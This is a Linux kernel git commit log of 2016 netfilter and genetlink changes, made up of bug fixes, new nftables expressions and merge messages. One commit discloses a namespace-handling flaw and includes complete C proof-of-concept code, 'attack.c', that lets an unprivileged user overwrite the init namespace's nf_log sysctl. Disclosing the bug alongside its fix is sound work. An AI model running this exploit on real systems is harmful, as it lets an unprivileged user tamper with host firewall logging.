redonkable/remarkable-linux

Author	SHA1	Message	Date
David S. Miller	4cb551a100	Merge git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next Pablo Neira Ayuso says: ==================== Netfilter updates for net-next The following patchset contains Netfilter updates for your net-next tree. This includes better integration with the routing subsystem for nf_tables, explicit notrack support and smaller updates. More specifically, they are: 1) Add fib lookup expression for nf_tables, from Florian Westphal. This new expression provides a native replacement for iptables addrtype and rp_filter matches. This is more flexible though, since we can populate the kernel flowi representation to inquire fib to accommodate new usecases, such as RTBH through skb mark. 2) Introduce rt expression for nf_tables, from Anders K. Pedersen. This new expression allows you to access skbuff route metadata, more specifically nexthop and classid fields. 3) Add notrack support for nf_tables, to skip conntracking, requested by many users already. 4) Add boilerplate code to allow to use nf_log infrastructure from nf_tables ingress. 5) Allow to mangle pkttype from nf_tables prerouting chain, to emulate the xtables cluster match, from Liping Zhang. 6) Move socket lookup code into generic nf_socket_* infrastructure so we can provide a native replacement for the xtables socket match. 7) Make sure nfnetlink_queue data that is updated on every packet is placed in a different cache from read-only data, from Florian Westphal. 8) Handle NF_STOLEN from nf_tables core, also from Florian Westphal. 9) Start round robin number generation in nft_numgen from zero, instead of n-1, for consistency with xtables statistics match, patch from Liping Zhang. 10) Set GFP_NOWARN flag in skbuff netlink allocations in nfnetlink_log, given we retry with a smaller allocation on failure, from Calvin Owens. 11) Cleanup xt_multiport to use switch(), from Gao feng. 12) Remove superfluous check in nft_immediate and nft_cmp, from Liping Zhang. ==================== Signed-off-by: David S. Miller <davem@davemloft.net>	2016-11-02 14:57:47 -04:00
Florian Westphal	886bc50348	netfilter: nf_queue: place volatile data in own cacheline As the comment indicates, the data at the end of nfqnl_instance struct is written on every queue/dequeue, so it should reside in its own cacheline. Before this change, 'lock' was in first cacheline so we dirtied both. Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:33 +01:00
Liping Zhang	e41e9d623c	netfilter: nf_tables: remove useless U8_MAX validation After call nft_data_init, size is already validated and desc.len will not exceed the sizeof(struct nft_data), i.e. 16 bytes. So it will never exceed U8_MAX. Furthermore, in nft_immediate_init, we forget to call nft_data_uninit when desc.len exceeds U8_MAX, although this will not happen, but it's a logical mistake. Now remove these redundant validation introduced by commit `36b701fae1` ("netfilter: nf_tables: validate maximum value of u32 netlink attributes") Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:32 +01:00
Anders K. Pedersen	2fa841938c	netfilter: nf_tables: introduce routing expression Introduces an nftables rt expression for routing related data with support for nexthop (i.e. the directly connected IP address that an outgoing packet is sent to), which can be used either for matching or accounting, eg. # nft add rule filter postrouting \ ip daddr 192.168.1.0/24 rt nexthop != 192.168.0.1 drop This will drop any traffic to 192.168.1.0/24 that is not routed via 192.168.0.1. # nft add rule filter postrouting \ flow table acct { rt nexthop timeout 600s counter } # nft add rule ip6 filter postrouting \ flow table acct { rt nexthop timeout 600s counter } These rules count outgoing traffic per nexthop. Note that the timeout releases an entry if no traffic is seen for this nexthop within 10 minutes. # nft add rule inet filter postrouting \ ether type ip \ flow table acct { rt nexthop timeout 600s counter } # nft add rule inet filter postrouting \ ether type ip6 \ flow table acct { rt nexthop timeout 600s counter } Same as above, but via the inet family, where the ether type must be specified explicitly. "rt classid" is also implemented identical to "meta rtclassid", since it is more logical to have this match in the routing expression going forward. Signed-off-by: Anders K. Pedersen <akp@cohaesio.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:31 +01:00
Pablo Neira Ayuso	8db4c5be88	netfilter: move socket lookup infrastructure to nf_socket_ipv{4,6}.c We need this split to reuse existing codebase for the upcoming nf_tables socket expression. Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:31 +01:00
Pablo Neira Ayuso	1fddf4bad0	netfilter: nf_log: add packet logging for netdev family Move layer 2 packet logging into nf_log_l2packet() that resides in nf_log_common.c, so this can be shared by both bridge and netdev families. This patch adds the boiler plate code to register the netdev logging family. Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:30 +01:00
Florian Westphal	f6d0cbcf09	netfilter: nf_tables: add fib expression Add FIB expression, supported for ipv4, ipv6 and inet family (the latter just dispatches to ipv4 or ipv6 one based on nfproto). Currently supports fetching output interface index/name and the rtm_type associated with an address. This can be used for adding path filtering. rtm_type is useful to e.g. enforce a strong-end host model where packets are only accepted if daddr is configured on the interface the packet arrived on. The fib expression is a native nftables alternative to the xtables addrtype and rp_filter matches. FIB result order for oif/oifname retrieval is as follows: - if packet is local (skb has rtable, RTF_LOCAL set, this will also catch looped-back multicast packets), set oif to the loopback interface. - if fib lookup returns an error, or result points to local, store zero result. This means '--local' option of -m rpfilter is not supported. It is possible to use 'fib type local' or add explicit saddr/daddr matching rules to create exceptions if this is really needed. - store result in the destination register. In case of multiple routes, search set for desired oif in case strict matching is requested. ipv4 and ipv6 fib expressions are supposed to behave the same. [ I have collapsed Arnd Bergmann's ("netfilter: nf_tables: fib warnings") http://patchwork.ozlabs.org/patch/688615/ to address fallout from this patch after rebasing nf-next, that was posted to address compilation warnings. --pablo ] Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:14 +01:00
David S. Miller	27058af401	Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net Mostly simple overlapping changes. For example, David Ahern's adjacency list revamp in 'net-next' conflicted with an adjacency list traversal bug fix in 'net'. Signed-off-by: David S. Miller <davem@davemloft.net>	2016-10-30 12:42:58 -04:00
Johannes Berg	56989f6d85	genetlink: mark families as __ro_after_init Now genl_register_family() is the only thing (other than the users themselves, perhaps, but I didn't find any doing that) writing to the family struct. In all families that I found, genl_register_family() is only called from __init functions (some indirectly, in which case I've added __init annotations to clarify things), so all can actually be marked __ro_after_init. This protects the data structure from accidental corruption. Signed-off-by: Johannes Berg <johannes.berg@intel.com> Signed-off-by: David S. Miller <davem@davemloft.net>	2016-10-27 16:16:09 -04:00
Johannes Berg	489111e5c2	genetlink: statically initialize families Instead of providing macros/inline functions to initialize the families, make all users initialize them statically and get rid of the macros. This reduces the kernel code size by about 1.6k on x86-64 (with allyesconfig). Signed-off-by: Johannes Berg <johannes.berg@intel.com> Signed-off-by: David S. Miller <davem@davemloft.net>	2016-10-27 16:16:09 -04:00
Johannes Berg	a07ea4d994	genetlink: no longer support using static family IDs Static family IDs have never really been used, the only use case was the workaround I introduced for those users that assumed their family ID was also their multicast group ID. Additionally, because static family IDs would never be reserved by the generic netlink code, using a relatively low ID would only work for built-in families that can be registered immediately after generic netlink is started, which is basically only the control family (apart from the workaround code, which I also had to add code for so it would reserve those IDs) Thus, anything other than GENL_ID_GENERATE is flawed and luckily not used except in the cases I mentioned. Move those workarounds into a few lines of code, and then get rid of GENL_ID_GENERATE entirely, making it more robust. Signed-off-by: Johannes Berg <johannes.berg@intel.com> Signed-off-by: David S. Miller <davem@davemloft.net>	2016-10-27 16:16:09 -04:00
Pablo Neira Ayuso	254432613c	netfilter: nft_ct: add notrack support This patch adds notrack support. I decided to add a new expression, given that this doesn't fit into the existing set operation. Notrack doesn't need a source register, and a hypothetical NFT_CT_NOTRACK key makes no sense since matching the untracked state is done through NFT_CT_STATE. I'm placing this new notrack expression into nft_ct.c, I think a single module is too much. Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:16 +02:00
Liping Zhang	96d9f2a72c	netfilter: nft_meta: permit pkttype mangling in ip/ip6 prerouting After supporting this, we can combine it with hash expression to emulate the 'cluster match'. Suggested-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:16 +02:00
Liping Zhang	0ecba4d9d1	netfilter: nft_numgen: start round robin from zero Currently we start round robin from 1, but it's better to start round robin from 0. This is to keep consistent with xt_statistic in iptables. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:16 +02:00
Florian Westphal	5efa0fc6d7	netfilter: nf_tables: allow expressions to return STOLEN Currently not supported, we'd oops as skb was (or is) free'd elsewhere. Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:15 +02:00
Calvin Owens	0813fbc913	netfilter: nfnetlink_log: Use GFP_NOWARN for skb allocation Since the code explicitly falls back to a smaller allocation when the large one fails, we shouldn't complain when that happens. Signed-off-by: Calvin Owens <calvinowens@fb.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:15 +02:00
Gao Feng	dd2602d00f	netfilter: xt_multiport: Use switch case instead of multiple condition checks There are multiple equality condition checks in the original codes, so it is better to use switch case instead of them. Signed-off-by: Gao Feng <fgao@ikuai8.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:15 +02:00
Pablo Neira Ayuso	7034b566a4	netfilter: fix nf_queue handling nf_queue handling is broken since `e3b37f11e6` ("netfilter: replace list_head with single linked list") for two reasons: 1) If the bypass flag is set on, there are no userspace listeners and we still have more hook entries to iterate over, then jump to the next hook. Otherwise accept the packet. On nf_reinject() path, the okfn() needs to be invoked. 2) We should not re-enter the same hook on packet reinjection. If the packet is accepted, we have to skip the current hook from where the packet was enqueued, otherwise the packets gets enqueued over and over again. This restores the previous list_for_each_entry_continue() behaviour happening from nf_iterate() that was dealing with these two cases. This patch introduces a new nf_queue() wrapper function so this fix becomes simpler. Fixes: `e3b37f11e6` ("netfilter: replace list_head with single linked list") Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-20 19:59:59 +02:00
Nicolas Dichtel	7bb6615d39	netfilter: conntrack: restart gc immediately if GC_MAX_EVICTS is reached When the maximum evictions number is reached, do not wait 5 seconds before the next run. CC: Florian Westphal <fw@strlen.de> Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com> Acked-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-20 19:59:53 +02:00
Florian Westphal	1ecc281ec2	netfilter: x_tables: suppress kmemcheck warning Markus Trippelsdorf reports: WARNING: kmemcheck: Caught 64-bit read from uninitialized memory (ffff88001e605480) 4055601e0088ffff000000000000000090686d81ffffffff0000000000000000 u u u u u u u u u u u u u u u u i i i i i i i i u u u u u u u u ^ \|RIP: 0010:[<ffffffff8166e561>] [<ffffffff8166e561>] nf_register_net_hook+0x51/0x160 [..] [<ffffffff8166e561>] nf_register_net_hook+0x51/0x160 [<ffffffff8166eaaf>] nf_register_net_hooks+0x3f/0xa0 [<ffffffff816d6715>] ipt_register_table+0xe5/0x110 [..] This warning is harmless; we copy 'uninitialized' data from the hook ops but it will not be used. Long term the structures keeping run-time data should be disentangled from those only containing config-time data (such as where in the list to insert a hook), but that's -next material. Reported-by: Markus Trippelsdorf <markus@trippelsdorf.de> Suggested-by: Al Viro <viro@ZenIV.linux.org.uk> Signed-off-by: Florian Westphal <fw@strlen.de> Acked-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-19 18:32:24 +02:00
Arnd Bergmann	d2e4d59351	netfilter: nf_tables: avoid uninitialized variable warning The newly added nft_range_eval() function handles the two possible nft range operations, but as the compiler warning points out, any unexpected value would lead to the 'mismatch' variable being used without being initialized: net/netfilter/nft_range.c: In function 'nft_range_eval': net/netfilter/nft_range.c:45:5: error: 'mismatch' may be used uninitialized in this function [-Werror=maybe-uninitialized] This removes the variable in question and instead moves the condition into the switch itself, which is potentially more efficient than adding a bogus 'default' clause as in my first approach, and is nicer than using the 'uninitialized_var' macro. Fixes: `0f3cd9b369` ("netfilter: nf_tables: add range expression") Link: http://patchwork.ozlabs.org/patch/677114/ Signed-off-by: Arnd Bergmann <arnd@arndb.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-18 17:35:10 +02:00
Pablo Neira Ayuso	ccca6607c5	netfilter: nft_range: validate operation netlink attribute Use nft_parse_u32_check() to make sure we don't get a value over the unsigned 8-bit integer. Moreover, make sure this value doesn't go over the two supported range comparison modes. Fixes: 9286c2eb1fda ("netfilter: nft_range: validate operation netlink attribute") Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 18:57:02 +02:00
Dan Carpenter	21a9e0f156	netfilter: nft_exthdr: fix error handling in nft_exthdr_init() "err" needs to be signed for the error handling to work. Fixes: `36b701fae1` ('netfilter: nf_tables: validate maximum value of u32 netlink attributes') Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:43:54 +02:00
Dan Carpenter	09525a09ad	netfilter: nf_tables: underflow in nft_parse_u32_check() We don't want to allow negatives here. Fixes: `36b701fae1` ('netfilter: nf_tables: validate maximum value of u32 netlink attributes') Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:43:53 +02:00
Liping Zhang	5751e175c6	netfilter: nft_hash: add missing NFTA_HASH_OFFSET's nla_policy Missing the nla_policy description will also miss the validation check in kernel. Fixes: `70ca767ea1` ("netfilter: nft_hash: Add hash offset value") Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:43:53 +02:00
Liping Zhang	f434ed0a00	netfilter: xt_ipcomp: add "ip[6]t_ipcomp" module alias name Otherwise, user cannot add related rules if xt_ipcomp.ko is not loaded: # iptables -A OUTPUT -p 108 -m ipcomp --ipcompspi 1 iptables: No chain/target/match by that name. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:38:19 +02:00
Liping Zhang	6d19375b58	netfilter: xt_NFLOG: fix unexpected truncated packet Justin and Chris spotted that iptables NFLOG target was broken when they upgraded the kernel to 4.8: "ulogd-2.0.5- IPs are no longer logged" or "results in segfaults in ulogd-2.0.5". Because "struct nf_loginfo li;" is a local variable, and flags will be filled with garbage value, not inited to zero. So if it contains 0x1, packets will not be logged to the userspace anymore. Fixes: `7643507fe8` ("netfilter: xt_NFLOG: nflog-range does not truncate packets") Reported-by: Justin Piszcz <jpiszcz@lucidpixels.com> Reported-by: Chris Caputo <ccaputo@alt.net> Tested-by: Chris Caputo <ccaputo@alt.net> Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:38:19 +02:00
Anders K. Pedersen	a8b1e36d0d	netfilter: nft_dynset: fix element timeout for HZ != 1000 With HZ=100 element timeout in dynamic sets (i.e. flow tables) is 10 times higher than configured. Add proper conversion to/from jiffies, when interacting with userspace. I tested this on Linux 4.8.1, and it applies cleanly to current nf and nf-next trees. Fixes: `22fe54d5fe` ("netfilter: nf_tables: add support for dynamic set updates") Signed-off-by: Anders K. Pedersen <akp@cohaesio.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:29:39 +02:00
Geert Uytterhoeven	1b203c138c	netfilter: xt_hashlimit: Add missing ULL suffixes for 64-bit constants On 32-bit (e.g. with m68k-linux-gnu-gcc-4.1): net/netfilter/xt_hashlimit.c: In function ‘user2credits’: net/netfilter/xt_hashlimit.c:476: warning: integer constant is too large for ‘long’ type ... net/netfilter/xt_hashlimit.c:478: warning: integer constant is too large for ‘long’ type ... net/netfilter/xt_hashlimit.c:480: warning: integer constant is too large for ‘long’ type ... net/netfilter/xt_hashlimit.c: In function ‘rateinfo_recalc’: net/netfilter/xt_hashlimit.c:513: warning: integer constant is too large for ‘long’ type Fixes: `11d5f15723` ("netfilter: xt_hashlimit: Create revision 2 to support higher pps rates") Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org> Acked-by: Vishwanath Pai <vpai@akamai.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:25:23 +02:00
Linus Torvalds	bd3769bfed	netfilter: Fix slab corruption. Use the correct pattern for singly linked list insertion and deletion. We can also calculate the list head outside of the mutex. Fixes: `e3b37f11e6` ("netfilter: replace list_head with single linked list") Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Reviewed-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: David S. Miller <davem@davemloft.net> net/netfilter/core.c \| 108 ++++++++++++++++----------------------------------- 1 file changed, 33 insertions(+), 75 deletions(-)	2016-10-11 04:44:37 -04:00
Liping Zhang	2fa46c1301	netfilter: nft_limit: fix divided by zero panic After I input the following nftables rule, a panic happened on my system: # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second divide error: 0000 [#1] SMP [ ... ] RIP: 0010:[<ffffffffa059035e>] [<ffffffffa059035e>] nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit] Call Trace: [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables] [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat] [<ffffffff81753767>] ? ipt_do_table+0x327/0x610 [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat] [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4] [<ffffffff816f4aa2>] nf_iterate+0x62/0x80 [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0 [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0 [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0 [<ffffffff81703d3c>] ip_local_out+0x1c/0x40 This is because divisor is 64-bit, but we treat it as a 32-bit integer, then 0xf00000000 becomes zero, i.e. divisor becomes 0. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-04 08:59:03 +02:00
Jann Horn	dbb5918cb3	netfilter: fix namespace handling in nf_log_proc_dostring nf_log_proc_dostring() used current's network namespace instead of the one corresponding to the sysctl file the write was performed on. Because the permission check happens at open time and the nf_log files in namespaces are accessible for the namespace owner, this can be abused by an unprivileged user to effectively write to the init namespace's nf_log sysctls. Stash the "struct net *" in extra2 - data and extra1 are already used. Repro code: #define _GNU_SOURCE #include <stdlib.h> #include <sched.h> #include <err.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/wait.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdio.h> char child_stack[1000000]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char *path, char *buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void *p_) { if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us as namespace root. */ char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait(&status) != child) err(1, "wait"); if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char *data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; } Repro: $ gcc -Wall -o attack attack.c -std=gnu99 $ cat /proc/sys/net/netfilter/nf_log/2 nf_log_ipv4 $ ./attack $ cat /proc/sys/net/netfilter/nf_log/2 NONE Because this looks like an issue with very low severity, I'm sending it to the public list directly. Signed-off-by: Jann Horn <jann@thejh.net> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-04 08:41:06 +02:00
Vishwanath Pai	1f827f5138	netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit division Division of 64bit integers will cause linker error undefined reference to `__udivdi3'. Fix this by replacing divisions with div64_64 Fixes: `11d5f15723` ("netfilter: xt_hashlimit: Create revision 2 to ...") Signed-off-by: Vishwanath Pai <vpai@akamai.com> Acked-by: Maciej Żenczykowski <maze@google.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-30 20:15:27 +02:00
Aaron Conole	7816ec564e	netfilter: accommodate different kconfig in nf_set_hooks_head When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle the request for registration properly by dropping the hook. This releases the entry during the set. Fixes: `e3b37f11e6` ("netfilter: replace list_head with single linked list") Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-30 20:15:26 +02:00
Aaron Conole	5119e4381a	netfilter: Fix potential null pointer dereference It's possible for nf_hook_entry_head to return NULL. If two nf_unregister_net_hook calls happen simultaneously with a single hook entry in the list, both will enter the nf_hook_mutex critical section. The first will successfully delete the head, but the second will see this NULL pointer and attempt to dereference. This fix ensures that no null pointer dereference could occur when such a condition happens. Fixes: `e3b37f11e6` ("netfilter: replace list_head with single linked list") Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-30 20:15:26 +02:00
Pablo Neira Ayuso	f20fbc0717	Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next Conflicts: net/netfilter/core.c net/netfilter/nf_tables_netdev.c Resolve two conflicts before pull request for David's net-next tree: 1) Between `c73c248490` ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment") from the net tree and commit `ddc8b6027a` ("netfilter: introduce nft_set_pktinfo_{ipv4, ipv6}_validate()"). 2) Between `e8bffe0cf9` ("net: Add _nf_(un)register_hooks symbols") and Aaron Conole's patches to replace list_head with single linked list. Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 23:34:19 +02:00
Liping Zhang	8cb2a7d566	netfilter: nf_log: get rid of XT_LOG_* macros nf_log is used by both nftables and iptables, so use XT_LOG_XXX macros here is not appropriate. Replace them with NF_LOG_XXX. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 23:16:45 +02:00
Liping Zhang	ff107d2776	netfilter: nft_log: complete NFTA_LOG_FLAGS attr support NFTA_LOG_FLAGS attribute is already supported, but the related NF_LOG_XXX flags are not exposed to the userspace. So we cannot explicitly enable log flags to log uid, tcp sequence, ip options and so on, i.e. such rule "nft add rule filter output log uid" is not supported yet. So move NF_LOG_XXX macro definitions to the uapi/../nf_log.h. In order to keep consistent with other modules, change NF_LOG_MASK to refer to all supported log flags. On the other hand, add a new NF_LOG_DEFAULT_MASK to refer to the original default log flags. Finally, if user specify the unsupported log flags or NFTA_LOG_GROUP and NFTA_LOG_FLAGS are set at the same time, report EINVAL to the userspace. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 23:16:43 +02:00
Pablo Neira Ayuso	0f3cd9b369	netfilter: nf_tables: add range expression Inverse ranges != [a,b] are not currently possible because rules are composites of && operations, and we need to express this: data < a || data > b This patch adds a new range expression. Positive ranges can already be expressed through two cmp expressions: cmp(sreg, data, >=) cmp(sreg, data, <=) This new range expression provides an alternative way to express this. Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 23:16:42 +02:00
Florian Westphal	58e207e498	netfilter: evict stale entries when user reads /proc/net/nf_conntrack Fabian reports a possible conntrack memory leak (could not reproduce so far), however, one minor issue can be easily resolved: > cat /proc/net/nf_conntrack \| wc -l = 5 > 4 minutes required to clean up the table. We should not report those timed-out entries to the user in first place. And instead of just skipping those timed-out entries while iterating over the table we can also zap them (we already do this during ctnetlink walks, but I forgot about the /proc interface). Fixes: `f330a7fdbe` ("netfilter: conntrack: get rid of conntrack timer") Reported-by: Fabian Frederick <fabf@skynet.be> Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:08 +02:00
Vishwanath Pai	11d5f15723	netfilter: xt_hashlimit: Create revision 2 to support higher pps rates Create a new revision for the hashlimit iptables extension module. Rev 2 will support higher pps of up to 1 million, Version 1 supports only 10k. To support this we have to increase the size of the variables avg and burst in hashlimit_cfg to 64-bit. Create two new structs hashlimit_cfg2 and xt_hashlimit_mtinfo2 and also create newer versions of all the functions for match, checkentry and destroy. Some of the functions like hashlimit_mt, hashlimit_mt_check etc are very similar in both rev1 and rev2 with only minor changes, so I have split those functions and moved all the common code to a *_common function. Signed-off-by: Vishwanath Pai <vpai@akamai.com> Signed-off-by: Joshua Hunt <johunt@akamai.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:06 +02:00
Vishwanath Pai	0dc60a4546	netfilter: xt_hashlimit: Prepare for revision 2 I am planning to add a revision 2 for the hashlimit xtables module to support higher packets per second rates. This patch renames all the functions and variables related to revision 1 by adding _v1 at the end of the names. Signed-off-by: Vishwanath Pai <vpai@akamai.com> Signed-off-by: Joshua Hunt <johunt@akamai.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:05 +02:00
Liping Zhang	7bfdde7045	netfilter: nft_ct: report error if mark and dir specified simultaneously NFT_CT_MARK is unrelated to direction, so if NFTA_CT_DIRECTION attr is specified, report EINVAL to the userspace. This validation check was already done at nft_ct_get_init, but we missed it in nft_ct_set_init. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:04 +02:00
Liping Zhang	d767ff2c84	netfilter: nft_ct: unnecessary to require dir when use ct l3proto/protocol Currently, if the user want to match ct l3proto, we must specify the direction, for example: # nft add rule filter input ct original l3proto ipv4 ^^^^^^^^ Otherwise, error message will be reported: # nft add rule filter input ct l3proto ipv4 nft add rule filter input ct l3proto ipv4 <cmdline>:1:1-38: Error: Could not process rule: Invalid argument add rule filter input ct l3proto ipv4 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Actually, there's no need to require NFTA_CT_DIRECTION attr, because ct l3proto and protocol are unrelated to direction. And for compatibility, even if the user specify the NFTA_CT_DIRECTION attr, do not report error, just skip it. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:02 +02:00
Gao Feng	8d11350f5f	netfilter: seqadj: Fix the wrong ack adjust for the RST packet without ack It is valid that the TCP RST packet which does not set ack flag, and bytes of ack number are zero. But current seqadj codes would adjust the "0" ack to invalid ack number. Actually seqadj need to check the ack flag before adjust it for these RST packets. The following is my test case client is 10.26.98.245, and add one iptable rule: iptables -I INPUT -p tcp --sport 12345 -m connbytes --connbytes 2: --connbytes-dir reply --connbytes-mode packets -j REJECT --reject-with tcp-reset This iptables rule could generate on TCP RST without ack flag. server:10.172.135.55 Enable the synproxy with seqadjust by the following iptables rules iptables -t raw -A PREROUTING -i eth0 -p tcp -d 10.172.135.55 --dport 12345 -m tcp --syn -j CT --notrack iptables -A INPUT -i eth0 -p tcp -d 10.172.135.55 --dport 12345 -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460 iptables -A OUTPUT -o eth0 -p tcp -s 10.172.135.55 --sport 12345 -m conntrack --ctstate INVALID,UNTRACKED -m tcp --tcp-flags SYN,RST,ACK SYN,ACK -j ACCEPT The following is my test result. 1. packet trace on client root@routers:/tmp# tcpdump -i eth0 tcp port 12345 -n tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [S], seq 3695959829, win 29200, options [mss 1460,sackOK,TS val 452367884 ecr 0,nop,wscale 7], length 0 IP 10.172.135.55.12345 > 10.26.98.245.45154: Flags [S.], seq 546723266, ack 3695959830, win 0, options [mss 1460,sackOK,TS val 15643479 ecr 452367884, nop,wscale 7], length 0 IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [.], ack 1, win 229, options [nop,nop,TS val 452367885 ecr 15643479], length 0 IP 10.172.135.55.12345 > 10.26.98.245.45154: Flags [.], ack 1, win 226, options [nop,nop,TS val 15643479 ecr 452367885], length 0 IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [R], seq 3695959830, win 0, length 0 2. seqadj log on server [62873.867319] Adjusting sequence number from 602341895->546723267, ack from 3695959830->3695959830 [62873.867644] Adjusting sequence number from 602341895->546723267, ack from 3695959830->3695959830 [62873.869040] Adjusting sequence number from 3695959830->3695959830, ack from 0->55618628 To summarize, it is clear that the seqadj codes adjust the 0 ack when receive one TCP RST packet without ack. Signed-off-by: Gao Feng <fgao@ikuai8.com> Signed-off-by: 